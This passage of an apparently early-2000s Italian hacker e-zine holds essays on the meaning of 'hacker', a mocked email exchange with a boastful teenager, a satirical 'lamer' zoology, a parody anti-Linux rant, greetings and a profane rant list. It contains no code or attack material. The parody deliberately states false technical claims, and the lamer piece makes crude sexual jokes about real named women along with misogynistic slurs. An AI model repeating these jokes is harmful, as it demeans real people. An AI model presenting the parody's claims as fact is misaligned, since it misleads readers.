010æ10@10Æ1ß01%01010&10ß| ETICA & RIFLESSIONI |0%101ð0101|010:10&101
01*010&101µ01þ010@10101½|-----------------------------|0°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


|----------------------------------------------------------|
|Art. N° <23> : "Matrix non esiste. O forse si?" di BiGAlex|
|----------------------------------------------------------|


++++¤¤} Matrix non esiste. O forse si? {¤¤++++

Ultimamente, stavo ripensando a matrix...una cazzata direte voi..
eppure pensavo che in realtà, anche se non esiste come ci è
presentata nel film una sorta di matrix esiste..non serve per
alimentare le macchine, non siamo schiavi di esse...semplicemente
è ciò che ci distingue dalle macchine: una nostra realtà che si
accentua di notte, ma che coesiste con noi. Potremmo raffigurarla
come il subconscio..la parte più nascosta della nostra mente che
si 'sfoga' nel sonno, ma che coesiste sempre nella nostra mente,
nella nostra personalità: esso ci permette di vedere le cose come
le vediamo e non in un altro modo, ma soprattutto, cosa che è
impossibile nelle macchine e che richiederebbe una consolle da
videogiochi che costerebbe una cifra, permette di simulare una realtà,
sia essa malvagia che benevola, una realtà che ci circonda, che ci
sembra reale..una realtà nella quale pensiamo e ci muoviamo...una
realtà dove ci sono tantissimi personaggi, tutti pensanti, personaggi
che si muovono, personaggi che interagiscono con noi, che parlano,
leggono, scrivono...magari volano o ci fanno del male...una realtà,
LA realtà, la realtà che noi ben conosciamo nel sonno...una realtà
che tuttavia muta ogni volta che prendiamo sonno..una realtà a volte
indomabile, proprio come la realtà che ci circonda normalmente.
Matrix esiste allora? E'vero che è nelle nostre menti? Si chiama
matrix o non ha ancora un nome?
Tante domande ci girano nella testa...
matrix, se così lo/a vogliamo chiamare, esiste ed è proprio nelle
nostre menti, tuttavia il nome matrix è inesatto: esso non ci viene
mostrato sottoforma di caratteri strani, ma come una serie di
impulti elettrici, quelli dell'elettroencefalogramma.
Potremmo chiamarlo impulse. Impulse quindi è molto simile a matrix,
mentre siamo dentro, tutto ci sembra reale..tuttavia una volta usciti
ci rendiamo conto che altro non era che un sogno. Quando siamo dentro,
proprio come in matrix, non possiamo muovere gli arti 'reali', ma solo
quelli che ci sembrano reali, ma che tali non sono. Di fatti, il
cervello si isola quasi completamente dalla realtà, bloccando ogni tipo
di muscolo, per evitare di causare danni al nostro corpo (cadute
improvvise ecc ecc).
La differenza è che in matrix, se ti fai male, questo si ripercuote anche
nel mondo reale..in impulse ciò non accade. In impulse sei 'protetto' contro
ogni genere di male, tranne quelli che pervengono dal mondo reale. Quando
sei in impulse, e qui intendo nel mondo 'irreale', sei invincibile,
non puoi morire, non puoi farti alcun male. In impulse hai il pieno
controllo del mondo..infatti non puoi morire. Ma ciò non è del tutto vero:
non sempre puoi leggere nel pensiero di colui con cui stai parlando, non
puoi evitare che certe azioni vengano compiute. In impulse tu credi
di avere il potere..ti credi invincibile, ma in realtà non lo sei.
Ma qual'è la realtà allora? La verità è questa: non lo sappiamo nemmeno
noi.

Ricordati: impulse è sempre con te, fino a quando non cessi le tue
funzioni vitali. Impulse è.



++++¤¤} Saluti {¤¤++++

Un saluto alla uiha..la crew di marsio, con tanti auguri (d natale e
d buona riuscita :)
Saluto poi tutti i ragazzi che nn ho salutato negli altri testi...
bye allz!

--
BiGAlex
Everyday is a strike 4 my head!
E-Mail: totalmeltdown@libero.it
SiTE: bigalex.cjb.net (f2s sucks!!!)


|------------------------------------|
| Art. N° <24> : "Hackers" di Elektro|
|------------------------------------|


HACKERS?
By Elektro

Ma chi sono in realtà questi personaggi di cui spesso parlano i mass-media e
ogni tanto anche nel mondo dei cinema? Questa leggenda esiste o si trova anche
nel mondo reale di tutti noi?

Tutti ne parlano ma nessuno li conosce. Forse nessuno conosce il vero
termine di questa parole, poichè esso è usato troppo spesso
impropriamente e a perso il suo vero e nobile significato.Infatti c'è
una grandissima confusione nella testa di ognuno di noi. Eccovi tre
definizioni tutte contrapposte una dall'altra del termine 'hacker':

- Colui che abusivamente si introduce in un sistema informatico altrui.
[Questa è la classica che trovate nei dizionari...]
- Appassionato di informatica: in genere un abile programmatore che
conosce fin nei minimi dettagli i vari sistemi operativi.
- Molto spesso sono gli stessi autori dei sistemi operativi e proprio per
questo li conoscono fin nei minimi dettagli. Raramente attaccano sistemi che
non gli competono ma ogni tanto compiono il loro buon hack.

Il problema più grande è che molto spesso i giornalisti usano la
parola 'hacker' come se avesse significato per il primo termine spiegato e
non per il secondo. Così al giorno d'oggi essere hacker equivale ad essere
paragonati ad un fuorilegge o a un delinquente.

Ma il problema non finisce solo qui. In realtà se ognuno di noi rifletesse
un po' di più si renderebbe conto che c'è davvero una gran confusione in
ognuno di noi, anche per quelli che davvero pensano di conoscere il vero
significato della parola.

Basti pensare che il termine hacker può essere anche così definito:

- Colui che riesce ad entrare in ogni sistema informatico, senza
distinzione se esso sia un piccolo server della piccola ditta sotto casa
ai sistemi informatici di uso militari quali NASA o Pentagono... Inoltre
si tratta di una persona che conosce tutti i linguaggi di programmazione e
che riesce a scrivere qualsiasi tipo di programma si voglia e ha una
conoscenza della Rete migliore delle sue stesse tasche...

Forse un tempo una persona simile a quella descritta poteva esistere ma
ora non più: non credo proprio che nel 2000 possano esistere persone che
conoscono TUTTI i linguaggi di programmazione e non credo che la stessa
persona abbia una conoscenza così ampia dei sistemi e dei relativi buchi
nella sicurezza da riuscire a entrare in TUTTI i sistemi informatici della
Rete... O forse no?

Ma anche se si riuscisse a dare un'unica definizione del termine Hacker,
credo che i problemi legati ad esso non sarebbero comunque finiti!
Esistono altre 'categorie' o chiamatele pure come vi pare, legate agli
hacker. Eccovele:

- Lamer: indica un hacker nato perdente. Negli ultimi tempi la parola va
ad indicare quasi in automatico tutti quelli che usano un trojan o un
nuke, attività considerate lamah.
- Lamah: vedi Lamer.
- Wannabe: deriva dall'inglese 'Voler essere'; va ad indicare tutti quelli
che vorrebbero diventare hackers. Purtroppo, negli ultimi tempi anche
questo termine sta subendo una connotazione negativa, poichè molti lo
usano come offesa, credendo che la parola Lamer e Wannabe siano perfetti
sinonimi.
- Script Kiddies: ovvero "il ragazzo degli script". Si tratta di un individuo
generalmente giovane ed inesperto che buca i siti con exploit e/o programmi
trovati in rete in siti di sicurezza scritti da altri.
- Cracker etico: Si tratta di uno cracker che ha messo le sue capacità al
servizio delle legalità: lavora presso aziende di sicurezza più o meno note.
- Cyber Warrior: a volte definito anche "Cracker di professione", è colui che
ha acquisito capacità molto elevate negli anni ed è un vero e proprio
mercenario, che si affida al cliente che paga di più. Alcuni difficilmente
attaccheranno multinazionali o grosse aziende, ma altri entrano anche in
sistemi governativi o militari senza grossi problemi. Si sentono sporchi ma
sono molto pericolosi.
- Cracker paranoico: è taciturno, schivo, estremamente paranoico. E' molto
abile, sia per le sue capacità tecniche, sia per la sua psicologia. Ha una
personalità piuttosto instabile ma è raro trovarsene uno che attacca il
proprio sistema.
- Smanettone italiano: questa non è una vera e propria sottocategoria di
hackers, ma semmai un termine che ho volutamente inserito io come tale. Penso
che fra tutte le descrizioni di uno smanettone, la più giusta sia quella che
indica uno smanettone come colui appassionato di PC, che ama lavorare con
tutto ciò che riguarda un computer o un programma e si dedica alla
programmazione con molta passione. Poi si interessa anche delle reti e
dell'hacking, ma per le sue scarse conoscenze non può essere definito come un
vero hacker.

Conclusioni: anche questo brave articolo è finito. Probabilmente non avete
imparato qualcosa che vi interesserà o che vi possa aiutare, ma probabilmente
vi siete resi conto che il termine 'hacker' ha sotto di lui una lunga storia e
probabilmente nessuno riuscirà mai a dare un vero significato ad una parola
che viene troppo spesso usata erroneamente o comunque con grande confusione.


|----------------------------------------------|
| Art. N° <25> : "Il lamah di turno" di Elektro|
|----------------------------------------------|


. . .S T O R I E D I L A M A H . . .

Ovvero gli appuntamenti infiniti... ;-)))

Rieccomi a voi ragazzi, con il nostro solito appuntamento.. Chissà se a
qualcuno di voi gliene frega qualcosa.. Va beh, questo non è un articolo
vero e proprio, è solo una delle tante storielle con uno dei tanti lamah
che girano su Internet.. Non riporto nè il nome nè la mail di quel povero
imbecille, ma solo le sue parole e relativi errori ortografici/di battitura...

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Mail da "lamah" ad "Elektro". Oggetto: "Ciauz"

Ciao, mi presento mi chiamo Emilio e sono un esperto proggrammatore che si
diverte ad hackerare così solamente per il piacere di far capire che internet
è il + grande buco.
Tu in che linguaggi proggrammi cosa fai di preciso, rimaniamo in contatto se
vuoi e diciamoci le nostre esperienze.

Io ho iniziato a proggrammare a soli 5 anni con il vecchio Pascal 1.3 :)
Anke io ho 14 anni sono dell'88 un sacco di persone mi hanno sottovalutato ma
dopo che gli ho fatto capire chi sono si sono rigreduti.
Vieni mai Mirc??

Risp.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Mail da "Elektro" a "lamah". Oggetto: "Ciauz"

Ciao Emilio,
beh, fatico un bel po' a credere che a 5 anni programmavi in Pascal...
Ma sentiamo, ora che linguaggi di pogrammazione/scripting conosci?
Si in Irc vado, Mirc no, quello è il client irc più famoso per chi usa i
sistemi Microsoft... Strano che tu da esperto programmatore confondi ste'
cose... Fatti sentire.
Byez
Elektro
teo1987@libero.it
www.mondohackers.cjb.net

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Mail da "lamah" ad "Elektro". Oggetto: "Re: Ciauz"

Cmq, io dicevo in irc, io sto di solito su #kills con il nick TRUNKS0 .
Io non so proggrammare in molti linguaggi, ma come si dici "non conta la
quantita, ma la qualità"

Cmq io di solito uso Delphi, c/c++, pascal.
tu?

[Commento: puoi dirmi il chan, ma come cazzo faccio a venir da te se non mi
dici qual cavolo sia il server?]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Mail da "Elektro" a "lamah". Oggetto: "Senza oggetto"

Ciao Zeus,
conosco un minimo di programmazione in Perl e socket sotto Linux, poco di C e
le basi del Pascal (anche se con il Pascal 7.0 mi dava un errore con una
libreria ma ora dovrebbe essere tutto a posto usando il Pascal 5.5).
E d'hacking quanto sai?
Byez
Elektro
teo1987@libero.it
www.mondohackers.cjb.net

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Mail da "lamah" ad "Elektro". Oggetto: "Re:"

Bhe in proggrammazione fatichi un po, cmq di hacking so quello che c'è da
sapere.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Mail da "Elektro" a "lamah". Oggetto: "Sorgenti..."

Beh, visto che dici di saper programmare bene perchè non mi mandi qualche tuo
sorgente di prog scritti da te? Così vediamo il tuo livello di conoscienze...
;)
Byez
Elektro
teo1987@libero.it
www.mondohackers.cjb.net

[...Chissà perchè ma poi non l'ho più sentito...]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The End ;)
Vi è piaciuta ? Se la risposta è sì, bene, tra due mesi con la prossima uscita
dell'e-zine ne troverete altre... Se la risposta è no, mi spiace per
voi...
NB = se avete log di chattate 'interessanti' e tutte da ridere, mandamele
pure, le migliori verranno pubblicate. ;-)


|-----------------------------------------------|
|Art. N° <26> : "Il lamer Fastidiosus" di Marvin|
|-----------------------------------------------|


##############################################################################


AVVISO
Ogni riferimento a fatti,luoghi o persone reali all'interno di questo testo
deve considerarsi puramente casuale.Nel caso siate lamers,fatevi un
esame di coscienza e toglietevi di mezzo.

--------------------------------------------
ANALISI DI UNA SPECIE:IL LAMER FASTIDIOSUS
--------------------------------------------

Come direbbe il buon caro Piero Angela,gli uomini sono animali che pensano
molto,ma il lamer non rientra in questa categoria.
Schifoso,lurido e dispettoso.Questa è l'analisi del "lamer comunis" che,come
tutti gli insetti ha un'intelligenza molto limitata.
Andiamo più nel dettaglio:sa ben poco di informatica(circa il 99% dei lamers
comunes rispecchia questa descrizione) e,per bucare un server,
utilizza l'exploit di turno(di certo non scritto da lui,s'intende).Spesso è
ignorante,non ha voglia di
sbattersi e sbandiera al mondo intero di essere un hacker solo perchè sa
utilizzare discretamente
Netbus.Probabilmente questo comportamento è dovuto al fatto che il lamer
comunis è spessissimo considerato
da tutti come un frustrato,e cerca di farsi bello con le femmine della
specie "Gnappa Orribilis" per
avere un qualche rapporto interpersonale.

NUTRIMENTO

Il lamer comunis si nutre di mailbombing e di trojan.Godono alla vista di una
mailbox intasata senza alcun motivo come uno
squalo all'odore del sangue.I trojan horses gli permettono di sopravvivere
all'interno di ignari pc,con
un comportamento simile a quello di una zecca.Ogni tanto inseriscono
variazioni nella loro dieta come
kickate in IRC ,oppure nukkate casuali,ma sempre secondo la regola della
"sopravvivenza passiva".La
"sopravvivenza passiva" si basa su un semplice ma fondamentale
concetto:perchè sbattersi per procurarsi
ciò che ci serve quando sono gli altri a farlo per noi?

LA LINGUA

I lamers hanno un loro lessico particolare:la sintassi è tattica(cioè
applicata o stravolta a seconda dei casi),come anche l'uso
del congiuntivo(considerata un'arma letale).Inoltre,al posto delle comuni
lettere dell'alfabeto,utilizzano la cosidetta "numerazione letteraria",
ovvero al posto di alcune lettere vengono utilizzati dei numeri,secondo
il seguente schema:
- 4 = A
- 5 = S
- 1 = I
- 0 = O
- 3 = E
- 8 = B
Oltre a queste corrispondenze alfanumeriche,anche la Kappa ha subito diverse
sevizie prima di essere codificata in una regola:"la K
ci va ogni volta che ci è un suono C"
(traduzione da "L4 k v4 us4t4 0gn1
v0lt4 k3 c1 3' 1 su0n0 C"

effettuata da C. Milton,tratta dal libro "Il mito del Lamer tra realtà e
putridume"
). Altra peculiarità
grammaticale risiede nell'uso della Z ogni volta che compare il suono S,e
nell'alternanza spasmodica di
maiuscole e minuscole (S0n0 s0L0 Un Gr4nD3 L4M3R0n3 !).

FORME PRIMORDIALI DI INTELLIGENZA

Dopo l'accurata osservazione compiuta da Milton nel corso delle sue
ricerche,si è notato che ogni lamer parla male di
Windows,indiscriminatamente(soprattutto Win95). Ora,è vero che l'OS Microsoft
non sia uno dei migliori in
fatto di stabilità e di affidabilità,ma siamo cresciuti con i suoi prodotti!Un
minimo di riconoscenza!E
poi,a saperlo utilizzare e configurare a fondo non è che sia poi così male...
Torniamo a noi.Il lamer
comunis fa di tutto per ridicolizzare il povero Bill Gates (con frasi tipo
"M1kr0z0ft Kr3p4" e cosette del
genere),quando non sa neanche che cosa possa essere un file di libreria;a quel
punto il suo cervello
comincia a ronzare come uno scooter smarmittato e giunge alla fantozziana
conclusione di installare
Linux.A quel punto al lamer crolla il mondo addosso:sbaglia la
partizione(p4rT1Z10n3? M4 k3 3'?),non sa
che cosa sia la partizione di swap(K0s4 3'? Un 8i5k0Tt0?) e si pone la
domanda apocalittica:avrò fatto
male a cancellare i miei milioni di filez senza un backup? Smonta l'ardisk,ne
compra uno nuovo con Win
pre-installato e gli sale una carogna da mezzo quintale che non lo fa dormire
per una notte. La maggior
parte degli studiosi pensano che la mentalità da fallito e frustrato sia da
attribuirsi al tentativo di
installazione del Pinguino.

Un altro caso in cui il lamer accresce il proprio senso di appartenenza
all'Und3rgr0und informatico (e ne viene subito
catapultato fuori) è l'overclocking.Pur non conoscendo la differenza tra una
Simm e una Dimm,smanetta
sulla scheda madre,scagliando a miglia di distanza jumpers,slot PCI (come ci
riescano non si sa ancora)
e processore (credendo che sia solo una spilla di metallo molto pesante e con
tante puntine inutili).
Quando si rende conto di aver distrutto il pc da 5 milioni comprato dal
babbo,la carogna ingrassa e sale
verso i 200 Kg.Il lamer allora non dorme per due notti.

LA VITA SOCIALE

Il lamer ama le donne,purchè gliela diano subito.Questo giustifica l'unione
con la "Gnappa Orribilis",specie sempre più
diffusa(soprattutto nei licei) che si ciba di qualsiasi cosa renda la sua
pelle simile ad uno zerbino
bagnato. Possono vivere sia da soli che in branco.Nel primo caso il loro
passatempo preferito è la
masturbazione davanti all'effige di Daria Bignardi come l'ha fatta
mammà("nella caaaaaaasaaaa....");nel
secondo è lo stesso,ma la masturbazione di gruppo ha come oggetto del
desiderio Rita Levi Montalcini
vestita da Wonder Woman. Il lamer acquista notorietà se viene "pizzicato" in
azione.A quel punto diventa
un idolo per gli altri,qualsiasi idiozia abbia fatto.

PREDATORE O PREDA?

Sicuramente preda.Di chi?Di certo si sa che le altre specie superiori,dalle
larve all'alieno che avete come vicino di casa,lo
considerano un bocconcino prelibato.Flamers, hackers e sysadmin sono i
predatori più comuni.Ma il lamer
continua a non voler imparare.


|-------------------------------------------------------------|
|Art. N° <27> : "Testo di contropropaganda su Linux" di Marvin|
|-------------------------------------------------------------|

--------------------------------
TESTO DI CONTROPROPAGANDA SU LINUX

altrimenti detto

LA PAROLA DI UN LAMER E' SACRA
-------------------------------

testo scritto in una crisi di follia

Martedì 2 Gennaio 2002.Mi presento,sono H4ck3r_d31_5i5t3m1_1mp055ib1li.Ma per
ragioni di brevità mi chiamano tutti il SUPR3M0.
il mio testo è una sorta di propaganda contro Linux xkè a dire la verità ci ha
rotto proprio i coglioni questo sistema friuèr e
opensors!Illustrerò i motivi che dovrebbero spingere un vero h4ck3r a usare
window e i programmi che la rete ci mette a
disposizione.
Per prima cosa,non è vero che window è un pacco.Innanzitutto volevo dire al
mio amico "5ono_il_+_br4v0_h4ck3r_d3l_mondo" che winXP
è crakkabilissimo,perkè c' ho un parente che lavora per ma Meccafii che mi ha
detto che suo figlio che studia informatica ha
incontrato uno sviluppatore della Maicrosoft che gli ha fatto vedere come si
fa in 3 minuti e senza trojan!Quindi non sparare
puttanate,il crack è facilissimo se conosci l'html,pirla!
Allora,window è facilissimo,al contrario di linux che deriva da sistemi Iunics
e che c' ha un promt dei comandi completamente
diverso dal DOS.E' anche vero che Linux usa la grafica (ma a quanto ne so io
solo la Slakuer 4.1 la usa),ma appena l'ho installato
non ci ho capito più niente!E poi richiede conoscenze disumane:solo Neo di
Matrix (minchia che film,un mio amico ha h4kerato il
sito dell' NSA con telnet in modalitàù "Realtà Virtuale" !)riuscirebbe a
capire anche solo le partizioni.
Mi è sempre bastata quella di win (che è già fatta) e non vedo perkè deve
arrivare linucs a stravolgere le cose!
Secondo motivo:se window lo usano in tutto il mondo,un motivo ci sarà!
Innanzitutto puoi usare tutti i programmi che vuoi,tanto sono tutti per window
(ah,poi mettero sul mio bellissimo sitoz
http://members.idiots.com/h4k3ro_il_m0nd0
la crackz per usare su win i giochi e i programmi del Makintosc... ;-)
);poi io mi fido di uno come Bill Gheits,che si è fatto
da solo ed è riuscito ad inventare il DOS con le sue mani.Uno così non deve
essere mica pirla,altrimenti non sarebbe l'uomo più
ricco del mondo.Poi non credo che abbia fregato l'idea alla Xerox per
window,quello è un genio e questa è solo una volg4re
menzogna.
Un altro motivo che spingerebbe qualsiasi vero h4ck3r ancora indeciso sul da
farsi è che con win puoi usare tutti i trojan e le
beckdoor che ci sono in circolazione,mentre linux non le ha.Anche perchè linux
è nato come server,e figurati se su un sistema nato
x exere server fanno girare delle backdoor,non sono mica scemi...ho sentito
dire che ci sono anche dei trojani e delle beck che
puoi usare su linux,ma per usarle devi aggiornare il kernel altrimenti
swappano troppo,e poi per farle devi conoscere benissimo
l'assembler,e quello sono solo in 8 in tutto il mondo che lo sanno :-(

Quando è uscito Linux il suo creatore (che si chiama Linux Torvaldo e ha
iniziato il progetto GNU per la salvaguardia delle specie
bovine africane) disse che linux è un "sistema per hacker fatto da hacker",ma
non aveva considerato che un vero hacker sa usare i
trojan come Netbas e BekOrifais,ed è stata una vera mossa da pirla non fari
girare sulla sua piattaforma!

E poi linux è troppo inkasinato:prima cosa è che ci sono moltissime edizioni
completamente diverse le une dalle altre,e i
programmi per un'edizione non sono compatibili per un'altra.Esistono
addirittura delle edizioni su un singolo dischetto,ma non
dimentichiamo che anche win 3.1 occupava una manciata di dischetti...
Con win invece le cose non sono così complicate,per una serie di semplici
motivi:
-Non devi aggiornare il registro di configurazione ogni tanto,perchè basta
prendersi le varie patch da Internet (che tra l'altro
pesano pochissimo,dagli 8 ai 17 Megabait) per aggiornare i difetti del sistema
-TUTTI i modem sono per windows.Infatti chi usa linux o usa modem per linux
oppure non va in internet.
-Linux non ha giochi belli e non riesce a sfruttare le schede video con più di
2 Megabait perchè non riescono a creare i driver di
quelle più recenti.
-Per usare decentemente Linux devi sapere: DOS,C,C++,Pascal,Turbo
Pascal,Visual Basic(che l'hanno copiato dalla Maicrosoft,copioni
e bari!),Visual
C++,Java,Javascript,ASP,PHP,Perl,CGI,Tcl/Tk,HTML,CSS,Assembler,Flash,Director,Xml,Wml,Xtml,i
marcatori meta e come
fare una crostata di mele con le pere.
-Linux non è compatibile con niente.Windows invece si.Ammetto che il 95 non
era il massimo (soprattutto perchè non potevi draggare
le icone sul menu Start),ma dal 98 in poi win è stabilissimo,bugiardo chi dice
il contrario.L'unico errore che forse ha commesso
la Maicrosoft è quella di mettere un firewall in WinXP:un firewall si chiama
così perchè scalda un sacco il pc,e quest'ultimo deve
avere delle grosse ventole o un bagno d'olio refrigerante per non causare
problemi.Vabbè che è una versione home del firewall,ma
comunque a lungo andare stressa i componenti del PC.
-Windows è ottimo come server.E' per questo che circa il 90% dei server di
Internet usa window,soprattutto 2000 e NT,ma non è
troppo raro trovare server con win 98.
-Ok,questo devo riconoscerlo:i pochi programmi di Linux sono totalmente gratis
(ma le versioni di Linux si pagano,molte volte più
di window),ma te li devi compilare tutti e devi farci delle modifiche sennò
non funzionano.Un amico di mio cugino ha il padre che
di lavoro fa giochi (lui e suo figlio hanno fatto Queik III Arena e Eig of
Empaiers II) e ha detto che per compilare un programma
che aveva scritto per lui e che pesava solo 25 Kilobait il suo compilatore di
Linux ci ha messo esattamente 13 ore,durante le
quali il pc ronzava e il lettore cd girava a vuoto!
Invece win non ha questi problemi:ogni programma è già stato compilato
(compresi i trojan) ed è già sotto forma di file con
estensione .exe (che qualcuno dovrà spiegarmi che significa altrimenti
impazzisco)

Tutti questi chiari motivi dovrebbero spingere un vero h4ck3r a non utilizzare
più linux,o a non installarlo proprio,perchè è un
vero pakko e in definitiva non serve a niente.Ecco.

############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|-----------------------------|1ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| SALUTI & RINGRAZIAMENTI |0%101ð0101|010:10&101
01*010&101µ01þ010@10101½|-----------------------------|0°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Beh, questi non potevano davvero mancare... O no? ;)
Elektro e tutto il suo corpo telematico saluta:

Allora qui trovate tutti i saluti, ringraziamenti e company ai nostri amici
smanettoni! Ovviamente, rigorosamente in ordine alfabetico... ;)

Tutti quelli di #hack, #smanettoni e del  chan #hacknitro, tutte le persone
che conosco, in particolare (in ordine alfabetico ;))):

BARTX: frà, grazie per l'articolo per l'e-zine e complimenti per il sito: c'è
roba interessante! ;D

BIGALEX: pazzi come te ce ne sono pochi... ;) Ah, grazie per i 3 articoli
pubblicati in quest'e-zine... :D

D3FU: Mi spiace molto per quel che ti è successo... :-((

DELILAH: sei una delle poche ragazze che si interessa di hacking... Continua
così! ;))

E4M : E io che credevo che scherzassi con tutti quei testi... eheheh A
proposito, complimenti, sono davvero interessanti... Altrimenti non li avrei
pubblicati...

ERMAK: Leggi sta ezine ;) e poi se ti piace puoi sempre scrivere un
articoletto per il secondo numba... ;)

HOLYHACK: grazie 1000 per dedicarmi il tuo tempo al posto di rilassarti in
vacanza! ^__^

_KOME_: ovvero l'amico Shisha-dipendente... ;) Dai, come al solito è solo una
battuta, sai che non è nulla di personale... ;) Frà aspetto il tuo testo
sull'XML, lo pubblico sul secondo numero dell'e-zine.

KORVIN: Uhmm.. topazzi.com... Ci sto ripensando, dopotutto quello spazio mi
farebbe comodo... eheheh Comunque grazie per la tua disponibilità!

MARSIO: Vedo che sei ancora tra noi... ;) Beh, occhio con i *.gov! Non fare
troppo il folle! E leggi bene sta' e-zine... ;)

MEPHISTO: Colui che emette più "ROTFL" che parole sensate... ;DD Ah, cazzo..
Mi spiace per TBOG, ma fallo tornare presto online da qualche altra perte: ne
vale la pena! ;)

M3XICAN: Dobbiamo sentirci na' sera in chat... ;) Grazie anche a te per i tuoi
testi e fammi sapere che ne pensi di sta' e-zine.

RAPTOR_: Rap, grazie pure a te per il testo e magari scrivine un altro per la
prox uscita dell'e-zine! ;-)

SILDON2K: Dobbiamo risentirci... Va beh, nel frattempo resta al fronte soldato
;)) e stammi bene!

THE VAMPIRE: Cazzo... Non ci sentiamo da una vita! Ma dove sei finito? In chat
non ci sei, alle mail non rispondi e al cell pure... Fatti sentire!

X3L4: hai visto che stiamo per far conoscere un po' alla gente il mitico
#hacknitro ? Ah, casomai per la prox uscite dell'e-zine scrivi anche te
qualcosa...;)

XANTHIC: Weee.. pure tu, fammi sapere che ne pensi di sta' e-zine e ricaricati
il cell! ;))

XPTERMINATOR: Minchia... Tu sei peggio di un bot: in chat ci sei sempre (o
quasi)... ;))


Infine una slinguazzata e un saluto a quella grandissima gnocca che tanto so
che non mi farò mai :°°-( di nome Megan Gale!!

Uhmm... Se ho dimenticato qualcuno, mi raccomando non offendetevi! Mica sono..
che ne so.. Dopotutto sono umano anch'io!


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| F U C K |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################

[Commento di Elektro: tutte le righe che ho scritto qui sotto, prendetele come
una cazzata, mi raccomando, altrimenti poi sembro più fumato di quel che in
realtà sono... ;))]

Questi non volevo metterli...
Dopotutto questa è una e-zine seria...
Io sono una persona seria (e anche Marvin)...
Sono una persona che non scrive 'Vaffanculo' o su qualche byte sperduto del
suo hard disk per prendersela con i coglioni di turno: sono di più serio di
tutto ciò...
ahahah Ma quante cazzate sparo? ihihih Sono ogni giorno peggio: da ricovero ;))
Va beh, cominciamo con la listona... ;-)

Fuck......[Loading]......ammazza ma quanto è lunga?!? ihihihihih

- Alla sQuola (immancabile...) e a tutte le istituzioni scolastiche ;)
- Alla GDF: ma quanto rompete le palle...
- Alla Telecoz (un saluto speciale a te lo dovevo fare... ;)): sei la stronza
che fa pagare care le bollette! Porcodio... Io voglio andare su Internet, ma
non ci voglio andare con il contascatti in mano... ihihihih Scherzo raga!
- A tutte le altre compagnie telefoniche... Infostrada, Wind, Omnitel, Blu e
tutte quelle che ho dimenticato...
- Tutti quelli che dicono che SOLO la Tim è ladra... Non ho parole ragazzi...
E l'Omnitel forse no? Io ho Omni e pago 1 sms ben 250 £ mentre in molte altre
nazioni d'Europa gli sms si pagano pochissimo o sono TOTALMENTE GRATIS...
Tutte le compagnie sono ladre.. Che cazzo andate a dire solo la Tim... Ma
vaffanculo va...
[okkey mi sono calmato...]
- Tutti quelli che mi rompono i coglioni.
- Tutti quelli che non credono in me e nelle mie capacità.
- I lamer: dai non offendetevi troppo, in fin dei conti vi ho messi pure
all'8° posto... Mica male... ;)


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| D O V E T R O V A R C I |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Potete fare 4 chiacchiere con noi inviandoci semplicemente una mail:

Elektro : teo1987@libero.it
Marvin : mh@altavista.it

Elektro lo potete trovare anche su IRC, su Azzurra:

Server Porta
irc.azzurranet.org 6667
Chan: #hacknitro #hack #smanettoni

E assieme a me qui su Azzurra troverete i miei amici, anche qualcuno che ha
scritto qui su questa e-zine. NB = Okkio che purtroppo non ci sono tutte le
sere in chat (eheh ho anch'io una mia vita sociale e i miei impegni nonostante
le parecchie ore sul PC ;DD).

############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| INVIARCI UN ARTICOLO |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Come inviare un vostro articolo alla Redazione? Semplice, scrivete alla mail
x-system@email.it, mettendo in allegato il vostro testo. Se io e Marvin lo
giudicheremo un buon testo, lo pubblicheremo qui nell'e-zine. Comunque in ogni
caso vi risponderemo per mail. ;))
Tutto chiaro?
Si.....


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
